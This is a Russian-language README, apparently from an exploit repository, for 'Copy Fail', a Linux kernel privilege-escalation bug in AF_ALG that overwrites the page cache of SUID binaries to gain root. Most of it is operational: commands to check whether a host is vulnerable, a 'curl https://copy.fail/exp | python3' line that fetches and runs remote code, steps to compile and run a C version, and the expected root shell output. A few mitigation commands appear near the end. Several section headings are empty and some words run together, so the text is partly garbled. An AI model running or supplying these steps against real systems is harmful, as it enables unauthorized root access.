
Большинство LPE-уязвимостей в Linux требуют гоночного окна или специфичного для ядра смещения. Copy Fail — это прямолинейный логический изъян, ему не нужно ни то, ни другое. Один и тот же Python-скрипт размером 732 байта (или .c elf) даёт root-права на каждом дистрибутиве Linux, выпущенном с 2017 года.
Данный материал предназначен только для образовательных целей и авторизованного тестирования безопасности. НЕ запускайте это на системах без явного разрешения.
Copy Fail (CVE-2026-31431) — это уязвимость локального повышения привилегий (LPE) в Linux, затрагивающая криптографический API ядра через AF_ALG.
Она позволяет непривилегированному пользователю перезаписать данные page cache SUID-бинарника (например, /usr/bin/su) и получить root-доступ.
AF_ALGalgif_aeados.splicesocket(AF_ALG)uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg
Ожидаемые индикаторы:
authencesn(hmac(sha256),cbc(aes))algif_aeadpython3 copy_fail_exp.py
curl https://copy.fail/exp | python3
su
id
Ожидаемый результат:
uid=0(root)
os.splice not foundПричина:
Решение:
gcc copy_fail_exp.c -o copy_fail
chmod +x copy_fail
./copy_fail
su
Возможные причины:
Установите необходимые инструменты:
apt update && apt install build-essential
dmesg | grep -i alg
lsmod | grep algif_aead
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead
Обновите систему:
apt update && apt upgrade
Если эксплойт не сработал, рассмотрите:
Используйте этот эксплойт ответственно — только в лабораториях, на CTF-соревнованиях и в авторизованных пентестах.